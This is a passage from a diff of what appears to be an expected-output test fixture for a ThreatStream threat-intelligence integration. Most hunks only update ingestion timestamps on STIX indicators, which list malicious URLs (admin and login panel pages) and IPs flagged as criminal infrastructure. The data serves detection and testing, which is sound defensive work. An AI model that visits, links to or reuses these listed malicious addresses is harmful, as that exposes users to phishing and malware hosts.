'http://pnny.kommanditgesel.icu/news/plast/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:58:28.73Z\"}", "category": "threat", "type": "indicator", @@ -15551,7 +15551,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024363400Z", + "ingested": "2021-12-14T14:57:43.118296916Z", "original": "{\"created\":\"2020-02-03T01:59:18.132Z\",\"description\":\"TS ID: 55283402096; iType: mal_url; State: active; Org: PT Master Web Network; Source: CyberCrime\",\"id\":\"indicator--1644ebf0-46d0-4dcc-8e04-3a58376cc625\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-03T01:59:18.132Z\",\"name\":\"mal_url: http://pa-buol.go.id/wp/panelnew/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pa-buol.go.id/wp/panelnew/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:18.132Z\"}", "category": "threat", "type": "indicator", @@ -15603,7 +15603,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024368600Z", + "ingested": "2021-12-14T14:57:43.118297373Z", "original": "{\"created\":\"2020-02-03T01:59:28.343Z\",\"description\":\"TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--a6588ee7-309e-49de-9884-faa2bdd702d2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-03T01:59:28.343Z\",\"name\":\"mal_url: http://89.160.20.156/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:28.343Z\"}", "category": "threat", "type": "indicator", @@ -15655,7 +15655,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024373300Z", + "ingested": "2021-12-14T14:57:43.118297894Z", "original": "{\"created\":\"2020-02-03T01:59:33.587Z\",\"description\":\"TS ID: 55283402100; iType: mal_url; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--8d5e44f6-7283-40f8-b9b3-2c4791832c4e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-03T01:59:33.587Z\",\"name\":\"mal_url: http://anorelier.hk/fshblfn8071/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://anorelier.hk/fshblfn8071/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:33.587Z\"}", "category": "threat", "type": "indicator", @@ -15707,7 +15707,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024377500Z", + "ingested": "2021-12-14T14:57:43.118298289Z", "original": "{\"created\":\"2020-02-03T01:59:54.52Z\",\"description\":\"TS ID: 55283402099; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f33dd90a-b849-42af-9bcb-f60476358305\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-03T01:59:54.52Z\",\"name\":\"mal_url: http://bendetta.online/mangooste/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bendetta.online/mangooste/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:54.52Z\"}", "category": "threat", "type": "indicator", @@ -15759,7 +15759,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024385200Z", + "ingested": "2021-12-14T14:57:43.118298805Z", "original": "{\"created\":\"2020-02-03T01:59:54.544Z\",\"description\":\"TS ID: 55283402097; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime\",\"id\":\"indicator--27f2f598-95d6-4e35-a42e-240093d4452d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-03T01:59:54.544Z\",\"name\":\"mal_url: http://kayfundz.ru/kay/eng/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kayfundz.ru/kay/eng/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:54.544Z\"}", "category": "threat", "type": "indicator", @@ -15811,7 +15811,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024391Z", + "ingested": "2021-12-14T14:57:43.118299356Z", "original": "{\"created\":\"2020-02-05T01:58:09.73Z\",\"description\":\"TS ID: 55287965572; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--65a8989b-25c3-498e-8247-0514d5aa719e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-05T01:58:09.73Z\",\"name\":\"mal_url: http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:09.73Z\"}", "category": "threat", "type": "indicator", @@ -15863,7 +15863,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024398500Z", + "ingested": "2021-12-14T14:57:43.118299794Z", "original": "{\"created\":\"2020-02-05T01:58:17.365Z\",\"description\":\"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-05T01:58:17.365Z\",\"name\":\"mal_url: http://89.160.20.156/hoist3/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/hoist3/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.365Z\"}", "category": "threat", "type": "indicator", @@ -15908,7 +15908,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024405700Z", + "ingested": "2021-12-14T14:57:43.118300242Z", "original": "{\"created\":\"2020-02-05T01:58:17.428Z\",\"description\":\"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--7aed3145-aab6-470d-bb4f-592d86654719\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-02-05T01:58:17.428Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.428Z\"}", "category": "threat", "type": "indicator", @@ -15960,7 +15960,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024411500Z", + "ingested": "2021-12-14T14:57:43.118300728Z", "original": "{\"created\":\"2020-02-05T01:58:31.683Z\",\"description\":\"TS ID: 55287965571; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--af8e5326-c1d4-4f9e-8f47-ee23c6a2606a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T01:58:31.683Z\",\"name\":\"mal_url: http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:31.683Z\"}", "category": "threat", "type": "indicator", @@ -16012,7 +16012,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024418600Z", + "ingested": "2021-12-14T14:57:43.118301166Z", "original": "{\"created\":\"2020-02-05T01:58:31.704Z\",\"description\":\"TS ID: 55287965557; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--59c28566-62b0-4102-ad17-53ec3a143144\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-05T01:58:31.704Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:31.704Z\"}", "category": "threat", "type": "indicator", @@ -16064,7 +16064,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024425500Z", + "ingested": "2021-12-14T14:57:43.118301556Z", "original": "{\"created\":\"2020-02-05T01:58:32.111Z\",\"description\":\"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-05T01:58:32.111Z\",\"name\":\"mal_url: http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:32.111Z\"}", "category": "threat", "type": "indicator", @@ -16116,7 +16116,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024432500Z", + "ingested": "2021-12-14T14:57:43.118302024Z", "original": "{\"created\":\"2020-02-05T01:58:32.145Z\",\"description\":\"TS ID: 55287965577; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--69661075-e6cb-4054-820c-61954757f0ba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-05T01:58:32.145Z\",\"name\":\"mal_url: http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:32.145Z\"}", "category": "threat", "type": "indicator", @@ -16168,7 +16168,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024439500Z", + "ingested": "2021-12-14T14:57:43.118302515Z", "original": "{\"created\":\"2020-02-05T01:58:34.795Z\",\"description\":\"TS ID: 55287965581; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--5be6be50-c2ef-4502-857e-f69dd17d37a9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-05T01:58:34.795Z\",\"name\":\"mal_url: http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:34.795Z\"}", "category": "threat", "type": "indicator", @@ -16219,7 +16219,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024446500Z", + "ingested": "2021-12-14T14:57:43.118302948Z", "original": "{\"created\":\"2020-02-05T01:58:34.836Z\",\"description\":\"TS ID: 55287965567; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7de3f68d-51ed-43c0-b5d9-c63d621aa99f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-05T01:58:34.836Z\",\"name\":\"mal_url: http://domainmanagerz.net/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://domainmanagerz.net/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:34.836Z\"}", "category": "threat", "type": "indicator", @@ -16271,7 +16271,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024453400Z", + "ingested": "2021-12-14T14:57:43.118303341Z", "original": "{\"created\":\"2020-02-05T01:58:41.381Z\",\"description\":\"TS ID: 55287965564; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime\",\"id\":\"indicator--08ec347d-3d22-45e6-96fc-3fc3bb37c720\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-05T01:58:41.381Z\",\"name\":\"mal_url: http://groupbizconsulting.com/p3/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groupbizconsulting.com/p3/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:41.381Z\"}", "category": "threat", "type": "indicator", @@ -16323,7 +16323,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024460500Z", + "ingested": "2021-12-14T14:57:43.118303881Z", "original": "{\"created\":\"2020-02-05T01:58:59.279Z\",\"description\":\"TS ID: 55287965569; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--b845a78e-d141-455e-92ff-df401787a3cd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-05T01:58:59.279Z\",\"name\":\"mal_url: http://samundarmarine.com/denty/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samundarmarine.com/denty/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:59.279Z\"}", "category": "threat", "type": "indicator", @@ -16375,7 +16375,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024467500Z", + "ingested": "2021-12-14T14:57:43.118304370Z", "original": "{\"created\":\"2020-02-05T01:59:03.426Z\",\"description\":\"TS ID: 55287965563; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime\",\"id\":\"indicator--e9d4f82a-bc23-4f9a-81e0-05097acc6daa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-05T01:59:03.426Z\",\"name\":\"mal_url: http://groupbizconsulting.com/p4/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groupbizconsulting.com/p4/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:03.426Z\"}", "category": "threat", "type": "indicator", @@ -16420,7 +16420,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024476500Z", + "ingested": "2021-12-14T14:57:43.118304770Z", "original": "{\"created\":\"2020-02-05T01:59:04.695Z\",\"description\":\"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime\",\"id\":\"indicator--57e76166-d475-4027-b2d9-b4910c5b0747\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-02-05T01:59:04.695Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:04.695Z\"}", "category": "threat", "type": "indicator", @@ -16472,7 +16472,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024483300Z", + "ingested": "2021-12-14T14:57:43.118305227Z", "original": "{\"created\":\"2020-02-05T01:59:06.271Z\",\"description\":\"TS ID: 55287965580; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--63fdc395-3d7f-4435-a7ea-2c26783ea7b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-05T01:59:06.271Z\",\"name\":\"mal_url: http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:06.271Z\"}", "category": "threat", "type": "indicator", @@ -16524,7 +16524,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024486700Z", + "ingested": "2021-12-14T14:57:43.118305759Z", "original": "{\"created\":\"2020-02-05T01:59:24.611Z\",\"description\":\"TS ID: 55287965562; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--9ed89f91-5df1-4cad-b6e7-9d275759d32e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-05T01:59:24.611Z\",\"name\":\"mal_url: http://ipblasta.com/kmaker/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ipblasta.com/kmaker/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:24.611Z\"}", "category": "threat", "type": "indicator", @@ -16576,7 +16576,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024491700Z", + "ingested": "2021-12-14T14:57:43.118306149Z", "original": "{\"created\":\"2020-02-05T01:59:31.341Z\",\"description\":\"TS ID: 55287965559; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime\",\"id\":\"indicator--421221e0-b0c7-4bbe-a12c-412f689f4769\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-05T01:59:31.341Z\",\"name\":\"mal_url: http://softtouchcollars.com/origin/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://softtouchcollars.com/origin/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:31.341Z\"}", "category": "threat", "type": "indicator", @@ -16621,7 +16621,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024497400Z", + "ingested": "2021-12-14T14:57:43.118306543Z", "original": "{\"created\":\"2020-02-05T01:59:47.461Z\",\"description\":\"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-05T01:59:47.461Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.461Z\"}", "category": "threat", "type": "indicator", @@ -16666,7 +16666,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024503600Z", + "ingested": "2021-12-14T14:57:43.118307131Z", "original": "{\"created\":\"2020-02-05T01:59:47.506Z\",\"description\":\"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-05T01:59:47.506Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.506Z\"}", "category": "threat", "type": "indicator", @@ -16718,7 +16718,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024507400Z", + "ingested": "2021-12-14T14:57:43.118307594Z", "original": "{\"created\":\"2020-02-05T02:00:16.19Z\",\"description\":\"TS ID: 55287965578; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--1a4e59e6-28dd-4087-9a19-b5d274d484d5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-05T02:00:16.19Z\",\"name\":\"mal_url: http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:16.19Z\"}", "category": "threat", "type": "indicator", @@ -16770,7 +16770,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024512600Z", + "ingested": "2021-12-14T14:57:43.118308040Z", "original": "{\"created\":\"2020-02-05T02:00:23.009Z\",\"description\":\"TS ID: 55287965575; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--aef5784f-1ba2-4f45-9345-9b96bffe3cfd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-05T02:00:23.009Z\",\"name\":\"mal_url: http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:23.009Z\"}", "category": "threat", "type": "indicator", @@ -16822,7 +16822,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024535600Z", + "ingested": "2021-12-14T14:57:43.118308496Z", "original": "{\"created\":\"2020-02-05T02:00:29.679Z\",\"description\":\"TS ID: 55287965579; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--5fbeda08-8cf4-459a-873c-28cef82221b5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-05T02:00:29.679Z\",\"name\":\"mal_url: http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:29.679Z\"}", "category": "threat", "type": "indicator", @@ -16874,7 +16874,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024540Z", + "ingested": "2021-12-14T14:57:43.118309051Z", "original": "{\"created\":\"2020-02-05T02:00:52.297Z\",\"description\":\"TS ID: 55287965570; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--b4e748c7-0beb-4b0f-a234-938ad9a6b884\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-05T02:00:52.297Z\",\"name\":\"mal_url: http://futuracosmetic.com/frank/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://futuracosmetic.com/frank/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:52.297Z\"}", "category": "threat", "type": "indicator", @@ -16926,7 +16926,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024544400Z", + "ingested": "2021-12-14T14:57:43.118309506Z", "original": "{\"created\":\"2020-02-05T02:00:57.141Z\",\"description\":\"TS ID: 55287965588; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--320c2f41-7546-4aa7-afef-5188df844448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T02:00:57.141Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/tel/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/tel/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.141Z\"}", "category": "threat", "type": "indicator", @@ -16978,7 +16978,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024550Z", + "ingested": "2021-12-14T14:57:43.118310010Z", "original": "{\"created\":\"2020-02-05T02:00:57.172Z\",\"description\":\"TS ID: 55287965586; iType: mal_url; State: active; Org: Hetzner Online GmbH; Source: CyberCrime\",\"id\":\"indicator--18a1307c-2dfc-43f9-9e47-93d00c63efcc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-02-05T02:00:57.172Z\",\"name\":\"mal_url: http://video-ld.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://video-ld.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.172Z\"}", "category": "threat", "type": "indicator", @@ -17030,7 +17030,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024554800Z", + "ingested": "2021-12-14T14:57:43.118310505Z", "original": "{\"created\":\"2020-02-05T02:00:57.733Z\",\"description\":\"TS ID: 55287965560; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--1e94e26d-5158-4519-b166-2b7e87c2e5de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-05T02:00:57.733Z\",\"name\":\"mal_url: http://nortonlilly.info/emma/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/emma/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.733Z\"}", "category": "threat", "type": "indicator", @@ -17082,7 +17082,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024561400Z", + "ingested": "2021-12-14T14:57:43.118311062Z", "original": "{\"created\":\"2020-02-05T02:01:03.604Z\",\"description\":\"TS ID: 55287965573; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime\",\"id\":\"indicator--e396f12a-867b-4e91-8796-d042aef55ce3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-05T02:01:03.604Z\",\"name\":\"mal_url: http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:03.604Z\"}", "category": "threat", "type": "indicator", @@ -17127,7 +17127,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024568600Z", + "ingested": "2021-12-14T14:57:43.118311488Z", "original": "{\"created\":\"2020-02-05T02:01:16.051Z\",\"description\":\"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T02:01:16.051Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:16.051Z\"}", "category": "threat", "type": "indicator", @@ -17179,7 +17179,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024576Z", + "ingested": "2021-12-14T14:57:43.118311929Z", "original": "{\"created\":\"2020-02-05T02:01:18.261Z\",\"description\":\"TS ID: 55287965582; iType: mal_url; State: active; Org: CyrusOne LLC; Source: 